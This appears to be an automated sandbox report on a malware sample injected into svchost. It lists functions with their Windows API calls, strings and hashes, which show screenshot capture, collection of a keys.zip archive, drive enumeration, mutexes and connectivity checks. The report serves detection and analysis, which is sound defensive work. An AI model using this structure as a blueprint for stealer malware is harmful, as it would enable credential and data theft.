                                                                                                                                                                                                                    • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                                    • String ID: 5NT$7F1BFC6B$keys.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 2685098104-2792955510
                                                                                                                                                                                                                    • Opcode ID: f19ac0ea75750ce4670e50be6c27497d217c92bb957834dcea19e5a2fbb9cb28
                                                                                                                                                                                                                    • Instruction ID: c06213b1eed9abbb4c11ff5360907248da8ade7d6854d3c723d800ba307d5478
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f19ac0ea75750ce4670e50be6c27497d217c92bb957834dcea19e5a2fbb9cb28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06517931A406855FDB129B389C98BF6BFE89F81308F1485E5E986DB341EB719948CB50
                                                                                                                                                                                                                    Function 02C8E920 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 150memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(02C7136E,\java\,?,75AF5180,00000000,?,?,02C7136E,?,?), ref: 02C8E959
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(02C7136E,\windows\,?,?,02C7136E,?,?), ref: 02C8E969
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E97C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013,?,?,02C7136E,?,?), ref: 02C8E998
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8E99F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8E9AF
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E9CF
                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02C8E9E4
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,?,?,02C7136E,?,?), ref: 02C8EA05
                                                                                                                                                                                                                    • ReadFile.KERNEL32 ref: 02C8EA32
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75AF5180,00000000,?,?,02C7136E,?,?), ref: 02C8EA8E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAA1
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAA4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAB1
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAB4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$ByteCharMultiWide$AllocFreeNamePathPointerReadShortSizeValidatememset
                                                                                                                                                                                                                    • String ID: \java\$\windows\$iBKS
                                                                                                                                                                                                                    • API String ID: 3070551764-2513530025
                                                                                                                                                                                                                    • Opcode ID: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                                    • Instruction ID: ff8bf14a6dcb9fd73a4fdef842a0580c8f30e8ec5885aa7bb6a116afd196ec38
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5041C471A843616BE721AF259C48FBB7AACFFC4F19F048618F814D71C0EB70DA0586A1
                                                                                                                                                                                                                    Function 02C82140 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 97stringthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C82160
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C821A8
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,id=,user!226533!1CE3AAD1), ref: 02C821BE
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C821C6
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,id=,user!226533!1CE3AAD1), ref: 02C821CD
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!226533!1CE3AAD1), ref: 02C821EF
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!226533!1CE3AAD1), ref: 02C821F6
                                                                                                                                                                                                                      • Part of subcall function 02C82030: memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                                      • Part of subcall function 02C82030: GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                                      • Part of subcall function 02C82030: SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                                      • Part of subcall function 02C82030: _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                                      • Part of subcall function 02C82030: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                                      • Part of subcall function 02C82030: WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,76229300), ref: 02C820FB
                                                                                                                                                                                                                      • Part of subcall function 02C82030: GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                                      • Part of subcall function 02C82030: CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!226533!1CE3AAD1), ref: 02C8223F
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!226533!1CE3AAD1), ref: 02C82246
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Drive$Type$CurrentFileHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLogicalModePriorityStringsWrite_snprintf
                                                                                                                                                                                                                    • String ID: AppEvents$Console$Control Panel$user!226533!1CE3AAD1$Environment$Identities$Software$System$id=
                                                                                                                                                                                                                    • API String ID: 3198928771-1651316742
                                                                                                                                                                                                                    • Opcode ID: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                                    • Instruction ID: 21637d07351c62209abd453d13aea30da296579d93d7853852444d9999779526
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E31F6B1980294AFD712EFE49C4D79EBB69EF8031CF904698ED08A7140D7704E55CF96
                                                                                                                                                                                                                    Function 02C8B100 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B127
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B175
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B181
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B185
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B196
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B19D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C8B1D0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B1DF
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B1E5
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B1E9
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B1FA
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B201
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8B22F
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8B245
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7F1BFC0D$scrs
                                                                                                                                                                                                                    • API String ID: 1455050916-1667420815
                                                                                                                                                                                                                    • Opcode ID: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
                                                                                                                                                                                                                    • Instruction ID: 1702d08459725db940bfbe12de1844016283b2e0f2e6e241e9736916e4f7f2d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48315B72D402585BCB21DB749C88BEB77A8EF85308F4446D4EA89D7100DF70DA59CBA0
                                                                                                                                                                                                                    Function 02C90120 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bffd6), ref: 02C90147
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90195
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C901A1
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C901A5
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C901B6
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C901BD
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C901F0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C901FF
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90205
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90209
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9021A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C90221
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C9024F
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C90265
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bffd6$scrs
                                                                                                                                                                                                                    • API String ID: 1455050916-2518254936
                                                                                                                                                                                                                    • Opcode ID: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
                                                                                                                                                                                                                    • Instruction ID: 9288b0c1c4f02724dd8a4a36e7fd7d1f34b3c2ca216c9da405f7a4d7332aa7bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2531F672D402995BDF269B74AC9CBEB77A8AF85300F4446D4EA89D3100DF70DA59CBA0
                                                                                                                                                                                                                    Function 02C8E0B0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0CC
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8E0E2
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0F0
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E0F9
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E117
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E125
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8DCE0,00000000,00000000,00000000), ref: 02C8E13A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C8E14B
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8E150
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E164
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E172
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8E17D
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BFD21,FAKTURA), ref: 02C8E197
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7F1BFD21$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v
                                                                                                                                                                                                                    • API String ID: 2736094147-4048276756
                                                                                                                                                                                                                    • Opcode ID: 5cc879c94f7da7a75bb0b9674b7da5d4addcd0b86d7b44c129d1f7609fb22484
                                                                                                                                                                                                                    • Instruction ID: bf16f44e971ad8498760596df9b01a7b91daa047f741fd308cd832d96a808c2e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cc879c94f7da7a75bb0b9674b7da5d4addcd0b86d7b44c129d1f7609fb22484
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05214931EC07557AF322B7608C0AF6A738C9F85B29F148B18FE14631C1CBB0E9014AA6
                                                                                                                                                                                                                    Function 02C8FEE0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FEFC
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8FF12
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FF20
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8FF29
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF47
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8FF55
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8FC70,00000000,00000000,00000000), ref: 02C8FF6A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C8FF7B
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8FF80
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF94
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8FFA2
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41), ref: 02C8FFAD
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BFF41,INTER), ref: 02C8FFC7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7F1BFF41$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 2736094147-395204026
                                                                                                                                                                                                                    • Opcode ID: 22c9544344223e8cda4f388e9201a6056ca5f764a5d66d3eed38308052f63cd0
                                                                                                                                                                                                                    • Instruction ID: e4c67908672cb35a4f12d2071a62a49761df94f8fdfc2e1b32ad9ce2f8eda8f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22c9544344223e8cda4f388e9201a6056ca5f764a5d66d3eed38308052f63cd0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10210A31AC47543BF312B7649C0AF5A73CCAF45B69F548758FE14A31C1DBB0A9018AB6
                                                                                                                                                                                                                    Function 02C77370 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7738C
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C77393
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C7739F
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                                      • Part of subcall function 02C7CBF0: memset.MSVCRT ref: 02C7CC09
                                                                                                                                                                                                                      • Part of subcall function 02C7CBF0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C7CC22
                                                                                                                                                                                                                      • Part of subcall function 02C98320: malloc.MSVCRT ref: 02C98332
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C77437
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C77445
                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,fuck), ref: 02C7744F
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C774F2
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77501
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77530
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7753F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7754D
                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000), ref: 02C77556
                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710,?,00000000), ref: 02C7759C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
                                                                                                                                                                                                                    • String ID: user!226533!1CE3AAD1$P0#v$fuck
                                                                                                                                                                                                                    • API String ID: 2939156510-3182957975
                                                                                                                                                                                                                    • Opcode ID: 2d7c50fa93b956e0672c43a51721cda743f6e35ab882156119189896743e9e10
                                                                                                                                                                                                                    • Instruction ID: 8bb9a241b0db1dacf2ee8b41bc80e65b0e64538a45a66047102142ce9d1b3c7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d7c50fa93b956e0672c43a51721cda743f6e35ab882156119189896743e9e10
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C51B0B19802449FDB11DF64D84CFA67BE9FB88314F158BBAE9584B291C730E518CF60
                                                                                                                                                                                                                    Function 02C87230 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 149fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$fwrite$fseek$fclosefread
                                                                                                                                                                                                                    • String ID: 7f1bf8b2
                                                                                                                                                                                                                    • API String ID: 2434908339-2242988197
                                                                                                                                                                                                                    • Opcode ID: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
                                                                                                                                                                                                                    • Instruction ID: 1e974ff73977e1a7b5a8d9bb28150bf6261c6c699c825a5e133cf8dde1618f11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8341F671A406449FD720EBA8CC85B6AF3E8EF98314F248A2DE985C37D1D278F4458B61
